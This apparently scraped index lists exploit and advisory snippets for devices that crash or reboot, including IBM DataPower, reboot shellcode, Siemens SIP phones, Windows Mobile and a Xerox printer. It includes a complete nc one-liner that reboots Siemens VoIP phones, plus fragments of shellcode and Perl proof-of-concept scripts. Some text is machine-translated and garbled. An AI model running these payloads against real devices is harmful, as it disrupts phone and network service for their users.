[IBM Datapower XS40] Denial of Service

It appears it is possible to crash the IBM DataPower XS40 Security Gateway device by sending a simple random? string to it, over an established SSL-connection. The device reboots as a response to the input. Tested vulnerable firmware is 3.6.1.5 Issue fixed as tested in 3.6.1.12 Tested as follows...

RHEL 2.1 : kernel (RHSA-2009:0001)

Updated kernel packages that fix a number of security issues are now available for Red Hat Enterprise Linux 2.1 running on 32-bit architectures. This update has been rated as having important security impact by the Red Hat Security Response Team. The kernel packages contain the Linux kernel, the...

IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service

IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service source: https://www.securityfocus.com/bid/33169/info IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Remote...

IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service

source: https://www.securityfocus.com/bid/33169/info IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Remote attackers can exploit this issue to cause the device to reboot, denying service to...

FreeBSD/x86 - reboot() Shellcode (15 bytes)

FreeBSD/x86 - reboot Shellcode 15 bytes. Shellcode exploit for FreeBSDx86 platform / FreeBSD reboot shellcode This will halt a system, which takes it offline until someone reboots it. Written by zillion at safemode.org / char shellcode =...

OpenBSD/x86 - reboot() Shellcode (15 bytes)

OpenBSD/x86 - reboot Shellcode 15 bytes. Shellcode exploit for OpenBSDx86 platform // ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : [email protected] // [email protected] char shellcode =...

Linux/x86 - Force Reboot Shellcode (36 bytes)

Linux/x86 - Force Reboot Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform Linux/x86 Force Reboot shellcode 36 bytes Author: Hamza Megahed Twitter: @HamzaMega blog: hamza-megadotblogspotdotcom E-mail: hamzadotmegahedatgmaildotcom xor %eax,%eax push %eax push $0x746f6f62 push $0x65722f6e...

siemens-dos.txt

Hi, echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060 Will disconnect all current VOIP and PSTN calls and reboot the C450IP/C475IP devices. Tested with current firmwares. Vendor Siemens was contacted 11/2007, no fix supplied yet. Have phun! sky & Any...

Siemens C450IP/C475IP DoS

Hi, echo -e "X sip:s XnFrom:sip:@xnTo:sip:@xn" | nc -q0 -u target 5060 Will disconnect all current VOIP and PSTN calls and reboot the C450IP/C475IP devices. Tested with current firmwares. Vendor Siemens was contacted 11/2007, no fix supplied yet. Have phun! sky & Any...

Siemens C450IP/C475IP SIP phones DoS

Malformed SIP request causes device to reboot...

Linux each version of the local root password cracking method-vulnerability warning-the black bar safety net

This time the old met was asked and the various linux versions of the local root password cracking method, I here own and on the network to collect some information, we want to see this article and just used to give the art a little help: A RedHat/CentOS/Fedora system password cracking 1. In the...

Packeteer PacketShaper Web Denial of Service

The remote host is affected by a denial of service vulnerability. Description : Packeteer PacketShaper is susceptible to a denial of service vulnerability in the web management interface. Requesting a specific URL will cause the device to reboot. The user must first log in but even read-only acce...

CVE-2008-4722

Unspecified vulnerability in Sun Integrated Lights-Out Manager ILOM 2.0.1.5 through 2.0.4.26 allows remote authenticated users to 1 access the service processor SP and cause a denial of service shutdown or reboot, or 2 access the host operating system and have an unspecified impact, via unknown...

Windows Mobile 6.0 Device long name Remote Reboot Exploit

No description provided by source. !/usr/bin/perl ----------WM6 remote overflow reboot PoC---------- Simple exploit for remote rebooting a windows mobile device Maybe we can use it for doing command execution, I've not test it since the device is rebooting and do not dump a core for further...

Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service)

Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot Denial of Service !/usr/bin/perl ----------WM6 remote overflow reboot PoC---------- Simple exploit for remote rebooting a windows mobile device Maybe we can use it for doing command execution, I've not test it since the device is...

Windows Mobile 6.0 Device long name Remote Reboot Exploit

Exploit for hardware platform in category dos / poc ========================================================= Windows Mobile 6.0 Device long name Remote Reboot Exploit ========================================================= !/usr/bin/perl ----------WM6 remote overflow reboot PoC---------- Simpl...

Microsoft Windows Mobile 6.0 - Device Long Name Remote Reboot (Denial of Service)

!/usr/bin/perl ----------WM6 remote overflow reboot PoC---------- Simple exploit for remote rebooting a windows mobile device Maybe we can use it for doing command execution, I've not test it since the device is rebooting and do not dump a core for further analysing. The bug is not realy in the...

Cross site request forgery (csrf)

The Marvell driver for the Netgear WN802T Wi-Fi access point with firmware 1.3.16 on the Marvell 88W8361P-BEM1 chipset does not properly parse the SSID information element in an association request, which allows remote authenticated users to cause a denial of service device reboot or hang or...

[IVIZ-08-008] LILO Security Model bypass exploiting wrong BIOS API usage

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ----------------------------------------------------------------------- iViZ Security Advisory 08-008 25/08/2008 - ----------------------------------------------------------------------- iViZ Techno Solutions Pvt. Ltd. http://www.ivizsecurity.com -...

xeroxphaser-dos.txt

!/usr/bin/perl carved-out by: crit3rion, just making th3 world a b3tt3r plac3! XeroxRemoteDoS.20080801.ver01 tanx to dr0pz0N3 for reminding me to close my $&! s0ck3t Make: Xerox Model: Phaser 8400 Firmware: 03/03/2004 What's the deal? Apparently, if you send an empty packet to a Xerox Phaser 8400...